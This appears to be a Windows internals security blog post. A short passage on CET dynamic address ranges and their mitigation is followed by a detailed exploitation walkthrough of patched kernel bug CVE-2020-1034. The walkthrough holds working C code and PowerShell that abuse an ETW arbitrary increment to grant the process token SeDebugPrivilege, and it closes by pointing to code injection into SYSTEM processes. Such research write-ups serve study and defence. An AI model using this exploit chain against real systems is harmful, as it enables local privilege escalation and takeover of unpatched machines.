    /* 0x0b20 */ struct _EX_PUSH_LOCK DynamicEHContinuationTargetsLock;
    /* 0x0b28 */ struct _PS_DYNAMIC_ENFORCED_ADDRESS_RANGES DynamicEnforcedCetCompatibleRanges;
    /* 0x0b38 */ unsigned long DisabledComponentFlags;
    ...
} EPROCESS, *PEPROCESS;

This new PS_DYNAMIC_ENFORCED_ADDRESS_RANGES structure contains an RTL_AVL_TREE and an EX_PUSH_LOCK. New ranges are inserted into the tree through a call to NtSetInformationProcess with the new information class ProcessDynamicEnforcedCetCompatibleRanges (0x66). The caller supplies a pointer to a PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION structure as the ProcessInformation argument, which contains the ranges to insert into the tree, or remove from it, depending on the Flags field:

typedef struct _PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE
{
    ULONG_PTR BaseAddress;
    SIZE_T Size;
    DWORD Flags;
} PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE, *PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE;

typedef struct _PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION
{
    WORD NumberOfRanges;
    WORD Reserved;
    DWORD Reserved2;
    PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE Ranges;
} PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION, *PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION;

The ranges are then read from the structure and inserted into the tree by the PspProcessDynamicEnforcedAddressRanges function. Of course, the process doesn’t have to call NtSetInformationProcess directly, as there is a wrapper function for this in the Win32 API exposed by KernelBase.dll – SetProcessDynamicEnforcedCetCompatibleRanges:

BOOL
SetProcessDynamicEnforcedCetCompatibleRanges (
    _In_ HANDLE ProcessHandle,
    _In_ WORD NumberOfRanges,
    _In_ PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE Ranges
    )
{
    NTSTATUS status;
    PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION dynamicEnforcedAddressRanges;
    dynamicEnforcedAddressRanges.NumberOfRanges = NumberOfRanges;
    dynamicEnforcedAddressRanges.Ranges = Ranges;
    status = NtSetInformationProcess(ProcessHandle,
                                     ProcessDynamicEnforcedCetCompatibleRanges,
                                     &dynamicEnforcedAddressRanges,
                                     sizeof(PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION));
    if (NT_SUCCESS(status))
    {
        return TRUE;
    }
    BaseSetLastNTError(status);
    return FALSE;
}

This tree is used every time a CET fault happens – KiControlProtectionFaultShadow is invoked. It calls into KiControlProtectionFault, which calls KiProcessControlProtection. This function will look for the target address in the shadow stack and if it fails, will try the dynamic enforced CET compatible ranges through an exception handler.

First, the handler checks if strict CET is enabled in the system, to know whether it should check if the process has CET enabled (as a reminder, strict CET means that CET checks will be performed on all processes, regardless of how they were compiled). If strict mode is not enabled, the function will check the image headers for the CETCOMPAT flag and will skip the ranges check if the flag is not set.

If it was determined that CET should be enforced for the image, the function will call RtlFindDynamicEnforcedAddressInRanges to check if the target address is inside one of the dynamically enforced CET compatible address ranges. The function returns a BOOLEAN value to indicate whether a suitable range for the address was found. If a range was found, or if for some other reason the process should not be crashed (the process is not CET compatible or audit mode is enabled), the function will then call KiFixupControlProtectionUserModeReturnMismatch to insert the target address into the shadow stack and allow the process to continue normal execution.
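The lookup itself is just a containment test over (base, size) pairs. A minimal sketch of what RtlFindDynamicEnforcedAddressInRanges decides – the real implementation walks the AVL tree rather than a flat array, and the type and function names here are mine:

```c
#include <stdint.h>

/* One declared CET-compatible range. */
typedef struct {
    uint64_t base;
    uint64_t size;
} cet_range_t;

/* Returns 1 if addr falls inside any declared range, 0 otherwise. */
static int address_in_ranges(const cet_range_t *ranges, int count, uint64_t addr)
{
    for (int i = 0; i < count; i++) {
        if (addr >= ranges[i].base && addr < ranges[i].base + ranges[i].size)
            return 1;
    }
    return 0;
}
```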

The Mitigation

Looking at all of this, an obvious flaw comes to mind. If a process can declare ranges that will be ignored by CET, all an exploit needs to do to bypass CET is manage to add a useful range in the process memory to the tree, and then ROP itself in the approved range.

This is why the CetDynamicApisOutOfProcOnly flag was added – it only allows a process to add dynamic CET compatible ranges for remote processes, not for itself. It does a very simple thing – inside NtSetInformationProcess, before calling PspProcessDynamicEnforcedAddressRanges, the function checks if CetDynamicApisOutOfProcOnly is set for the process and if the process is trying to add dynamic CET compatible ranges for itself. If so, the function will return STATUS_ACCESS_DENIED and the attempt will fail.

And actually in the newest builds of Windows, almost all Windows processes have this flag set by default. The only process that doesn’t appear to have it enabled is the Idle process (which doesn’t have a real EPROCESS structure, only a KPROCESS, so we’re effectively reading garbage memory).


Exploiting a “Simple” Vulnerability – In 35 Easy Steps or Less!

Introduction

In September 2020, Microsoft issued a patch that fixed the CVE-2020-1034 vulnerability. This is a pretty cool and relatively simple vulnerability (an increment by one), so I wanted to use it as a case study and look at a side of exploitation that isn’t talked about very often. Most public talks and blog posts related to vulnerabilities and exploits go into depth about the vulnerability itself, its discovery and research, and end with a PoC showing a successful “exploitation” – usually a BSOD with some kernel address being set to 0x41414141. This type of analysis is cute and splashy, but I wanted to look at the step after the crash – how do you take a vulnerability and actually build a stable exploit around it, preferably one that isn’t detected easily?

This post will go into a bit more detail about the vulnerability itself, as when it’s been explained by others it was mainly with screenshots of assembly code, and data structures with magic numbers and uninitialized stack variables. Thanks to tools such as the public symbol files (PDB) from Microsoft, SDK header files, as well as Hex-rays Decompiler from IDA, a slightly easier to understand analysis can be made, revealing the actual underlying cause(s). Then, this post will focus on exploring the Windows mechanisms involved in the vulnerability and how they can be used to create a stable exploit that results in local privilege escalation without crashing the machine (which is what a naïve exploitation of this vulnerability will eventually result in, for reasons I’ll explain).

 

The Vulnerability

In short, CVE-2020-1034 is an input validation bug in EtwpNotifyGuid that allows an increment of an arbitrary address. The function doesn’t account for all possible values of a specific input parameter (ReplyRequested): for values other than 0 and 1 it will treat an address inside the input buffer as an object pointer and try to reference it, which results in an increment at ObjectAddress - offsetof(OBJECT_HEADER, Body). The root cause is essentially that one check applies the BOOLEAN logic of “!= FALSE” while another uses “== TRUE”. A value such as 2 incorrectly fails the second check, but still passes the first.
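The offsetof arithmetic is the same math ObReferenceObject does: back up from the object body to the header and increment the first field. A self-contained sketch with a heavily simplified OBJECT_HEADER (the real header has more fields between PointerCount and Body, but PointerCount really is first, so the same subtraction applies):

```c
#include <stddef.h>
#include <stdint.h>

/* Heavily simplified OBJECT_HEADER: PointerCount first, body last. */
typedef struct {
    int64_t PointerCount;
    int64_t HandleCount;
    unsigned char Body[1];   /* the object body follows the header */
} OBJECT_HEADER;

/* ObReferenceObject-style math: from a body pointer, back up to the
   header and increment PointerCount. With an attacker-controlled body
   pointer, this is an increment of an arbitrary address. */
static void reference_object(void *body)
{
    OBJECT_HEADER *hdr =
        (OBJECT_HEADER *)((char *)body - offsetof(OBJECT_HEADER, Body));
    hdr->PointerCount++;
}
```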

NtTraceControl receives an input buffer as its second parameter. In the case leading to this vulnerability, the buffer will begin with a structure of type ETWP_NOTIFICATION_HEADER. This input parameter is passed into EtwpNotifyGuid, where the following check happens:

If NotificationHeader->ReplyRequested is 1, the ReplyObject field of the structure will be populated with a new UmReplyObject. A little further down the function, the notification header, or actually a kernel copy of it, is passed to EtwpSendDataBlock and from there to EtwpQueueNotification, where we find the bug:

If NotificationHeader->ReplyRequested is not 0, ObReferenceObject is called, which is going to grab the OBJECT_HEADER that is found right before the object body and increment PointerCount by 1. Now we can see the problem – ReplyRequested is not a single bit that can be either 0 or 1. It’s a BOOLEAN, meaning it can be any value from 0 to 0xFF. And for any non-zero value other than 1, EtwpNotifyGuid will leave the ReplyObject field untouched, but EtwpQueueNotification will still call ObReferenceObject with whichever address the (user-mode) caller supplied for this field, leading to an increment of an arbitrary address. Since PointerCount is the first field in OBJECT_HEADER, this means that the address that will be incremented is NotificationHeader->ReplyObject - offsetof(OBJECT_HEADER, Body).
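The mismatch between the two checks can be boiled down to a few lines of C (the function names are mine; the two comparisons are the ones from the kernel code above):

```c
typedef unsigned char BOOLEAN;  /* can hold 0x00-0xFF, not just 0 or 1 */

/* EtwpNotifyGuid only replaces the caller's ReplyObject when the value
   is exactly 1... */
static int kernel_overwrites_reply_object(BOOLEAN reply_requested)
{
    return reply_requested == 1;
}

/* ...but EtwpQueueNotification references whatever is in ReplyObject
   for any non-zero value. */
static int kernel_references_reply_object(BOOLEAN reply_requested)
{
    return reply_requested != 0;
}

/* The caller-controlled pointer reaches ObReferenceObject exactly when
   the second check passes and the first one doesn't. */
static int caller_pointer_gets_referenced(BOOLEAN reply_requested)
{
    return kernel_references_reply_object(reply_requested) &&
           !kernel_overwrites_reply_object(reply_requested);
}
```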

The fix of this bug is probably obvious to anyone reading this and involved a very simple change in EtwpNotifyGuid:

if (notificationHeader->ReplyRequested != FALSE)
{
    status = EtwpCreateUmReplyObject((ULONG_PTR)etwGuidEntry,
                                     &Handle,
                                     &replyObject);
    if (NT_SUCCESS(status))
    {
        notificationHeader->ReplyObject = replyObject;
        goto allocateDataBlock;
    }
}
else
{
    ...
}

Any non-zero value in ReplyRequested will lead to allocating a new reply object that will overwrite the value passed in by the caller.

On the surface this bug sounds very easy to exploit. But in reality, not so much. Especially if we want to make our exploit evasive and hard to detect. So, let’s begin our journey by looking at how this vulnerability is triggered and then try to exploit it.

How to Trigger

This vulnerability is triggered through NtTraceControl, which has this signature:

NTSTATUS
NTAPI
NtTraceControl (
    _In_ ULONG Operation,
    _In_ PVOID InputBuffer,
    _In_ ULONG InputSize,
    _In_ PVOID OutputBuffer,
    _In_ ULONG OutputSize,
    _Out_ PULONG BytesReturned
);

If we look at the code inside NtTraceControl we can learn a few things about the arguments we need to send to trigger the vulnerability:

The function has a switch statement for handling the Operation parameter – to reach EtwpNotifyGuid we need to use EtwSendDataBlock (17). We also see some requirements about the sizes we need to pass in, and we can also notice that the NotificationType we need to use should not be EtwNotificationTypeEnable as that will lead us to EtwpEnableGuid instead. There are a few more restrictions on the NotificationType field, but we’ll see those soon.

It’s worth noting that this code path is called by the Win32 exported function EtwSendNotification, which Geoff Chappell documented on his blog. His page on Notify GUIDs is also valuable, and corroborates the parameter checks shown above.

Let’s look at the ETWP_NOTIFICATION_HEADER structure to see what other fields we need to consider here:

typedef struct _ETWP_NOTIFICATION_HEADER
{
    ETW_NOTIFICATION_TYPE NotificationType;
    ULONG NotificationSize;
    LONG RefCount;
    BOOLEAN ReplyRequested;
    union
    {
        ULONG ReplyIndex;
        ULONG Timeout;
    };
    union
    {
        ULONG ReplyCount;
        ULONG NotifyeeCount;
    };
    union
    {
        ULONGLONG ReplyHandle;
        PVOID ReplyObject;
        ULONG RegIndex;
    };
    ULONG TargetPID;
    ULONG SourcePID;
    GUID DestinationGuid;
    GUID SourceGuid;
} ETWP_NOTIFICATION_HEADER, *PETWP_NOTIFICATION_HEADER;

We’ve already seen some of these fields, others we haven’t, and some don’t matter much for the purpose of our exploit. We’ll begin with the field that required the most work – DestinationGuid:

Finding the Right GUID

ETW is based on providers and consumers, where the providers notify about certain events and the consumers can choose to be notified by one or more providers. Each of the providers and consumers in the system is identified by a GUID.

Our vulnerability is in the ETW notification mechanism (which used to be WMI but now it is all part of ETW). When sending a notification, we are actually notifying a specific GUID, so we need to be careful to pick one that will work.

The first requirement is picking a GUID that actually exists on the system:

One of the first things that happens in EtwpNotifyGuid is a call to EtwpFindGuidEntryByGuid, with the DestinationGuid passed in, followed by an access check on the returned ETW_GUID_ENTRY.

What GUIDs are Registered?

To find a GUID that will successfully pass this code we should first go over a bit of ETW internals. The kernel has a global variable named PspHostSiloGlobals, which is a pointer to an ESERVERSILO_GLOBALS structure. This structure contains an EtwSiloState field, which is an ETW_SILODRIVERSTATE structure. This structure has lots of interesting information that is needed for ETW management, but the one field we need for our research is EtwpGuidHashTable. This is an array of 64 ETW_HASH_BUCKET structures. To find the right bucket for a GUID, it needs to be hashed this way: (Guid->Data1 ^ (Guid->Data2 ^ Guid->Data4[0] ^ Guid->Data4[4])) & 0x3F. This system was probably implemented as a performant way to find the kernel structures for GUIDs, since hashing the GUID is faster than iterating a list.
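The bucket computation is simple enough to replicate in plain C (the GUID layout matches the Windows SDK definition; the function name is mine):

```c
#include <stdint.h>

/* Standard GUID layout, as in the Windows SDK. */
typedef struct {
    uint32_t Data1;
    uint16_t Data2;
    uint16_t Data3;
    uint8_t  Data4[8];
} GUID;

/* Index into the 64-entry EtwpGuidHashTable, per the formula above. */
static unsigned etw_guid_bucket(const GUID *g)
{
    return (g->Data1 ^ (g->Data2 ^ g->Data4[0] ^ g->Data4[4])) & 0x3F;
}
```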

Each bucket contains a lock and 3 linked lists, corresponding to the 3 values of ETW_GUID_TYPE:

These lists contain structures of type ETW_GUID_ENTRY, which have all the needed information for each registered GUID:

As we can see in the screenshot earlier, EtwpNotifyGuid passes EtwNotificationGuid type as the ETW_GUID_TYPE (unless NotificationType is EtwNotificationTypePrivateLogger, but we will see later that we should not be using that). We can start by using some WinDbg magic to print all the ETW providers registered on my system under EtwNotificationGuidType and see which ones we can choose from:

When EtwpFindGuidEntryByGuid is called, it receives a pointer to the ETW_SILODRIVERSTATE, the GUID to search for and the ETW_GUID_TYPE that this GUID should belong to, and returns the ETW_GUID_ENTRY for this GUID. If a GUID is not found, it will return NULL and EtwpNotifyGuid will exit with STATUS_WMI_GUID_NOT_FOUND.

dx -r0 @$etwNotificationGuid = 1
dx -r0 @$GuidTable = ((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpGuidHashTable
dx -g @$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid]).Where(list => list.Flink != &list).Select(list => (nt!_ETW_GUID_ENTRY*)(list.Flink)).Select(Entry => new { Guid = Entry->Guid, Refs = Entry->RefCount, SD = Entry->SecurityDescriptor, Reg = (nt!_ETW_REG_ENTRY*)Entry->RegListHead.Flink})

Only one active GUID is registered on my system! This GUID could be interesting to use for our exploit, but before we do, we should look at a few more details related to it.

In the diagram earlier we can see the RegListHead field inside the ETW_GUID_ENTRY. This is a linked list of ETW_REG_ENTRY structures, each describing a registered instance of the provider, since the same provider can be registered multiple times, by the same process or different ones. We’ll grab the “hash” of this GUID (25) and print some information from its RegList:

dx -r0 @$guidEntry = (nt!_ETW_GUID_ENTRY*)(@$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid])[25].Flink)
dx -g Debugger.Utility.Collections.FromListEntry(@$guidEntry->RegListHead, "nt!_ETW_REG_ENTRY", "RegList").Select(r => new {Caller = r.Caller, SessionId = r.SessionId, Process = r.Process, ProcessName = ((char[15])r.Process->ImageFileName)->ToDisplayString("s"), Callback = r.Callback, CallbackContext = r.CallbackContext})

There are 6 instances of this GUID being registered on this system by 6 different processes. This is cool but could make our exploit unstable – when a GUID is notified, all of its registered entries get notified and might try to handle the request. This causes two complications:

  1. We can’t accurately predict how many increments our exploit will cause for the target address, since we could get one increment for each registered instance (though this isn’t guaranteed – the reason will be explained soon).
  2. Each of the processes that registered this provider could try to use our fake notification in a different way that we didn’t plan for. They could try to use the fake event, or read some data that isn’t formatted properly, and cause a crash. For example, if the notification has NotificationType = EtwNotificationTypeAudio, Audiodg.exe will try to process the message, which will make the kernel free the ReplyObject. Since the ReplyObject is not an actual object, this causes an immediate crash of the system. I didn’t test different cases, but it’s probably safe to assume that even with a different NotificationType this will still crash eventually as some registered process tries to handle the notification as a real one.

Since the goal we started with was creating a stable and reliable exploit that doesn’t randomly crash the system, it seems that this GUID is not the right one for us. But this is the only registered provider in the system, so what else are we supposed to use?

A Custom GUID

We can register our own provider! This way we are guaranteed that no one else is going to use it and we have full control over it. EtwNotificationRegister allows us to register a new provider with a GUID of our choice.

And again, I’ll save you the trouble of trying this out for yourself and tell you in advance that this just doesn’t work. But why?

Like everything on Windows, an ETW_GUID_ENTRY has a security descriptor describing which actions different users and groups are allowed to perform on it. And as we saw in the screenshot earlier, before notifying a GUID, EtwpNotifyGuid calls EtwpAccessCheck to check if the GUID grants WMIGUID_NOTIFICATION access to the user that is trying to notify it.

To test this, I registered a new provider, which we can see when we dump the registered providers the same way we did earlier:

And used the !sd command to print its security descriptor nicely (this is not the full descriptor; I trimmed it down to the relevant part):

A security descriptor contains a list of entries, each pairing a group or user, represented by a SID (in the form of “S-1-...”), with an ACCESS_MASK describing the actions that group is allowed to perform on the object. Since we are running as a normal user with an integrity level of medium, we are usually pretty limited in what we can do. The main groups our process belongs to are Everyone (S-1-1-0) and Users (S-1-5-32-545). As we can see here, the default security descriptor for an ETW_GUID_ENTRY doesn’t contain any specific access mask for Users, and the access mask for Everyone is 0x1800 (TRACELOG_JOIN_GROUP | TRACELOG_REGISTER_GUIDS). Higher access masks are reserved for more privileged groups, such as Local System and Administrators. Since our user doesn’t have WMIGUID_NOTIFICATION access to this GUID, we will receive STATUS_ACCESS_DENIED when trying to notify it and our exploit will fail.

That is, unless you are running it on a machine that has Visual Studio installed. Then the default security descriptor changes, and Performance Log Users (which includes basically any logged-in user) receive all sorts of interesting privileges, including the two we care about. But let’s pretend your exploit is not running on a machine with one of the most popular Windows development tools installed and focus on clean Windows machines without weird permission bugs.

Well, not all GUIDs use the default security descriptor. It is possible to change the access rights for a GUID, through the registry key HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Security:

This key contains all the GUIDs in the system using non-default security descriptors. The data is the security descriptor for the GUID, but since it is shown here as a REG_BINARY it is a bit difficult to parse this way.

Ideally, we would just add our new GUID here with a more permissive configuration and go on to trigger the exploit. Unfortunately, letting any user change the security descriptor of a GUID would break the Windows security model, so access to this registry key is reserved for SYSTEM, Administrators and EventLog:

If our default security descriptor is not strong enough and we can’t change it without a more privileged process, it looks like we can’t actually achieve much using our own GUID.

Living Off the Land

Luckily, using the one registered GUID on the system and registering our own GUID are not the only available choices. There are a lot of other GUIDs in that registry key that already have modified permissions. Hopefully, at least one of them allows WMIGUID_NOTIFICATION for a non-privileged user.

Here we face another issue: in this case, WMIGUID_NOTIFICATION alone is not enough. Since none of these GUIDs is a registered provider yet, we will first need to register them before we can use them for our exploit. When registering a provider through EtwNotificationRegister, the request goes through NtTraceControl and reaches EtwpRegisterUMGuid, where this check is done:

To be able to use an existing GUID, we need it to allow both WMIGUID_NOTIFICATION and TRACELOG_REGISTER_GUIDS for a normal user. To find one we’ll use the magic of PowerShell, which manages to have such an ugly syntax that it almost made me give up and write a registry parser in C instead (and yes, that -band is a boolean AND. I’m sorry). We’ll iterate over all the GUIDs in the registry key, check the security descriptor for Everyone (S-1-1-0), and print the GUIDs that allow at least one of the permissions we need:

$RegPath = "HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Security"
foreach($line in (Get-Item $RegPath).Property) { $mask = (New-Object System.Security.AccessControl.RawSecurityDescriptor ((Get-ItemProperty $RegPath | select -Expand $line), 0)).DiscretionaryAcl | where SecurityIdentifier -eq S-1-1-0 | select AccessMask; if ($mask -and [Int64]($mask.AccessMask) -band 0x804) { $line; $mask.AccessMask.ToString("X")}}

Not much luck here. Other than the GUID we already know about, nothing grants both of the permissions we need to Everyone.

But I’m not giving up yet! Let’s try the script again, this time checking the permissions for Users (S-1-5-32-545):

foreach($line in Get-Content C:\Users\yshafir\Desktop\guids.txt) { $mask = (New-Object System.Security.AccessControl.RawSecurityDescriptor ((Get-ItemProperty $RegPath | select -Expand $line), 0)).DiscretionaryAcl | where SecurityIdentifier -eq S-1-5-32-545 | select AccessMask; if ($mask -and [Int64]($mask.AccessMask) -band 0x804) { $line; $mask.AccessMask.ToString("X")}}

Now this is much better! There are multiple GUIDs allowing both the things we need; we can choose any of them and finally write an exploit!

For my exploit I chose to use the second GUID in the screenshot – {4838fe4f-f71c-4e51-9ecc-8430a7ac4c6c} – belonging to “Kernel Idle State Change Event”. This was a pretty random choice, and any of the other ones that enable both needed rights should work the same way.

What Do We Increment?

Now starts the easy part – we register our shiny new GUID, choose an address to increment, and trigger the exploit. But what address do we want to increment?

The easiest choice for privilege escalation is the token privileges:

dx ((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->Privileges
((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->Privileges                 [Type: _SEP_TOKEN_PRIVILEGES]    
[+0x000] Present          : 0x602880000 [Type: unsigned __int64]    
[+0x008] Enabled          : 0x800000 [Type: unsigned __int64]    
[+0x010] EnabledByDefault : 0x40800000 [Type: unsigned __int64]

When checking if a process or a thread can do a certain action in the system, the kernel checks the token privileges – both the Present and Enabled bits. That makes privilege escalation relatively easy in our case: if we want to give our process a certain useful privilege – for example SE_DEBUG_PRIVILEGE, which allows us to open a handle to any process in the system – we just need to increment the privileges of the process token until they contain the privilege we want to have.

There are a few simple steps to achieve that:

  1. Open a handle to the process token.
  2. Get the address of the token object in the kernel – Use NtQuerySystemInformation with SystemHandleInformation class to receive all the handles in the system and iterate them until we find the one matching our token and save the Object address.
  3. Calculate the address of Privileges.Present and Privileges.Enabled based on the offsets inside the token.
  4. Register a new provider with the GUID we found.
  5. Build the malicious ETWP_NOTIFICATION_HEADER structure and call NtTraceControl the correct number of times (0x100000 for SE_DEBUG_PRIVILEGE) to increment Privileges.Present, and again to increment Privileges.Enabled.

Like a lot of things, this sounds great until you actually try it. In reality, you will see that your privileges don’t get incremented by 0x100000. In fact, the Present privileges only get incremented by 4 and Enabled stays untouched. To understand why, we need to go back to ETW internals…

Slots and Limits

Earlier we saw how the GUID entry is represented in the kernel and that each GUID can have multiple ETW_REG_ENTRY structures registered to it, representing each registration instance. When a GUID gets notified, the notification gets queued for all of its registration instances (since we want all processes to receive a notification). For that, the ETW_REG_ENTRY has a ReplyQueue, containing 4 ReplySlot entries. Each of these points to an ETW_QUEUE_ENTRY structure, which contains the information needed to handle the request – the data block provided by the notifier, the reply object, flags, etc:

This is not relevant for this exploit, but the ETW_QUEUE_ENTRY also contains a linked list of all the queued notifications waiting for this process, from all GUIDs. I’m mentioning it here because it could be a cool way to reach different GUIDs and processes, and is worth exploring 🙂

Since every ETW_REG_ENTRY only has 4 reply slots, it can only have 4 notifications waiting for a reply at any time. Any notification that arrives while the 4 slots are full will not be handled – EtwpQueueNotification will reference the “object” supplied in ReplyObject, only to immediately dereference it when it sees that the reply slots are full:

Usually this is not an issue since notifications get handled pretty quickly by the consumer waiting for them and get removed from the queue almost immediately. However, this is not the case for our notifications – we are using a GUID that no one else is using, so no one is waiting for these notifications. On top of that, we are sending “corrupted” notifications, which have the ReplyRequested field set to non-zero, but don’t have a valid ETW registration object set as their ReplyObject (since we are using an arbitrary pointer that we want to increment). Even if we reply to the notifications ourselves, the kernel will try to treat our ReplyObject as a valid ETW registration object, and that will most likely crash the system one way or another.

Sounds like we are blocked here — we can’t reply to our notifications and no one else will either, and that means we have no way to free the slots in the ETW_REG_ENTRY and are limited to 4 notifications. Since freeing the slots will probably result in crashing the system, it also means that our process can’t exit once it triggers the vulnerability – when a process exits all of its handles get closed and that will lead to freeing all the queued notifications.

Keeping our process alive is not much of an issue, but what can we do with only 4 increments?

The answer is, we don’t really need to limit ourselves to 4 increments and can actually use just one – if we use our knowledge of how ETW works.

Provider Registration to the Rescue

Now we know that every registered provider can only have up to 4 notifications waiting for a reply. The good news is that there is nothing stopping us from registering more than one provider, even for the same GUID. And since every notification gets queued for all registered instances for the GUID, we don’t even need to notify each instance separately – we can register X providers and only send one notification, and receive X increments for our target address! Or we can send 4 notifications and get 4X increments (for the same target address, or up to 4 different ones):

Knowing that, can we register 0x100000 providers, then notify them once with a “bad” ETW notification and get SE_DEBUG_PRIVILEGE in our token and finally have an exploit?

Not exactly.

When registering a provider using EtwNotificationRegister, the function first needs to allocate and initialize an internal registration data structure that will be sent to NtTraceControl to register the provider. This data structure is allocated with EtwpAllocateRegistration, where we see the following check:

Ntdll only allows the process to register up to 0x800 providers. If the current number of registered providers for the process is 0x800, the function will return and the operation will fail.

Of course, we can try to bypass this by figuring out the internal structures, allocating them ourselves and calling NtTraceControl directly. However, I wouldn’t recommend it — this is complicated work and might cause unexpected side effects when ntdll tries to handle a reply for providers it doesn’t know about.

Instead, we can do something much simpler: we want to increment our privileges by 0x100000. If we look at the privileges as separate bytes rather than as a single value, we’ll see that we actually only need to increment the third byte by 0x10:

To make our exploit simpler and only require 0x10 increments, we will just add 2 bytes to our target addresses for both Privileges.Present and Privileges.Enabled. We can further minimize the number of calls we need to make to NtTraceControl if we register 0x10 providers using the GUID we found, then send one notification with the address of Privileges.Present as a target, and another with the address of Privileges.Enabled.

Now we only have one thing left to do before writing our exploit – building our malicious notification.

Notification Header Fields

ReplyRequested

As we’ve seen in the beginning of this post (so to anyone who made it this far, probably 34 days ago), the vulnerability is triggered through a call to NtTraceControl with an ETWP_NOTIFICATION_HEADER structure where ReplyRequested is a value other than 0 and 1. For this exploit I’ll use 2, but any other value between 2 and 0xFF will work.

NotificationType

Then we need to pick a notification type out of the ETW_NOTIFICATION_TYPE enum:

typedef enum _ETW_NOTIFICATION_TYPE
{
    EtwNotificationTypeNoReply = 1,
    EtwNotificationTypeLegacyEnable = 2,
    EtwNotificationTypeEnable = 3,
    EtwNotificationTypePrivateLogger = 4,
    EtwNotificationTypePerflib = 5,
    EtwNotificationTypeAudio = 6,
    EtwNotificationTypeSession = 7,
    EtwNotificationTypeReserved = 8,
    EtwNotificationTypeCredentialUI = 9,
    EtwNotificationTypeMax = 10,
} ETW_NOTIFICATION_TYPE;

We’ve seen earlier that our chosen type should not be EtwNotificationTypeEnable, since that will lead to a different code path that will not trigger our vulnerability.

We also shouldn’t use EtwNotificationTypePrivateLogger or EtwNotificationTypeFilteredPrivateLogger. Using these types changes the destination GUID to PrivateLoggerNotificationGuid and requires TRACELOG_GUID_ENABLE access, which is not available to normal users. Other types, such as EtwNotificationTypeSession and EtwNotificationTypePerflib, are used across the system and could lead to unexpected results if some system component tries to handle our notification as belonging to a known type, so we should probably avoid those too.

The two safest types to use are the last ones – EtwNotificationTypeReserved, which is not used by anything in the system that I could find, and EtwNotificationTypeCredentialUI, which is only used in notifications from consent.exe when it opens and closes the UAC popup, with no additional information sent. (What is this notification good for? It’s unclear, and since no one is listening for it, I’d guess Microsoft isn’t sure either, or forgot it exists.) For this exploit, I chose to use EtwNotificationTypeCredentialUI.

NotificationSize

As we’ve seen in NtTraceControl, the NotificationSize field has to be at least sizeof(ETWP_NOTIFICATION_HEADER). We have no need for any more than that, so we will make it this exact size.

ReplyObject

This will be the address that we want to increment, plus offsetof(OBJECT_HEADER, Body): the kernel treats ReplyObject as the body of an object and walks back to the OBJECT_HEADER in front of it to reach the reference count, so we add the offset of Body to our target address to compensate and make the increment land exactly where we want. And to that we add 2 more bytes to directly increment the third byte, which is the one we are interested in.

This is the only field we’ll need to change between our notifications – our first notification will increment Privileges.Present, and the second will increment Privileges.Enabled.

Other than DestinationGuid, which we already talked about a lot, the other fields don’t interest us and are not used in our code paths, so we can leave them at 0.

Building the Exploit

Now we have everything we need to try to trigger our exploit and get all those new privileges!

Registering Providers

First, we’ll register our 0x10 providers. This is pretty easy and there’s not much to explain here. For the registration to succeed we need to supply a callback, which will be called whenever the provider is notified and can reply to the notification. I chose not to do anything in this callback, but it’s an interesting part of the mechanism that could be put to other uses, such as an injection technique.

But this blog post is already long enough so we will just define a minimal callback that does nothing:

ULONG
EtwNotificationCallback (
    _In_ ETW_NOTIFICATION_HEADER* NotificationHeader,
    _In_ PVOID Context
    )
{
    return 1;
}

And then register our 0x10 providers with the GUID we picked:

REGHANDLE regHandle;
for (int i = 0; i < 0x10; i++)
{
    result = EtwNotificationRegister(&EXPLOIT_GUID,
                                     EtwNotificationTypeCredentialUI,
                                     EtwNotificationCallback,
                                     NULL,
                                     &regHandle);
    if (!SUCCEEDED(result))
    {
        printf("Failed registering new provider\n");
        return 0;
    }
}

I’m reusing the same handle variable because I have no intention of closing these handles – closing them would free the used slots, and we’ve already determined that this would lead to a system crash.

The Notification Header

After all this work we finally have our providers and all the notification fields that we need, so we can build our notification header and trigger the exploit! Earlier I explained how to get the address of our token; since it mostly involves a lot of code, I won’t show it here again. Let’s assume that getting the token was successful and we have its address.

First, we calculate the 2 addresses we will want to increment:

presentPrivilegesAddress = (PVOID)((ULONG_PTR)tokenAddress +
                           offsetof(TOKEN, Privileges.Present) + 2);
enabledPrivilegesAddress = (PVOID)((ULONG_PTR)tokenAddress +
                           offsetof(TOKEN, Privileges.Enabled) + 2);

Then we will define our data block and zero it:

ETWP_NOTIFICATION_HEADER dataBlock;
RtlZeroMemory(&dataBlock, sizeof(dataBlock));

And populate all the needed fields:

dataBlock.NotificationType = EtwNotificationTypeCredentialUI;
dataBlock.ReplyRequested = 2;
dataBlock.NotificationSize = sizeof(dataBlock);
dataBlock.ReplyObject = (PVOID)((ULONG_PTR)(presentPrivilegesAddress) +
                        offsetof(OBJECT_HEADER, Body));
dataBlock.DestinationGuid = EXPLOIT_GUID;

And finally, call NtTraceControl with our notification header (we could have passed dataBlock as the output buffer too, but I decided to define a new ETWP_NOTIFICATION_HEADER and use that for clarity):

status = NtTraceControl(EtwSendDataBlock,
                        &dataBlock,
                        sizeof(dataBlock),
                        &outputBuffer,
                        sizeof(outputBuffer),
                        &returnLength);

We will then repopulate the fields with the same values, set ReplyObject to (PVOID)((ULONG_PTR)(enabledPrivilegesAddress) + offsetof(OBJECT_HEADER, Body)) and call NtTraceControl again to increment our Enabled privileges.

Then we look at our token:

And we have SeDebugPrivilege!

Now what do we do with it?

Using SeDebugPrivilege

Once you have SeDebugPrivilege you have access to any process in the system. This gives you plenty of different ways to run code as SYSTEM, such as injecting code to a system process.

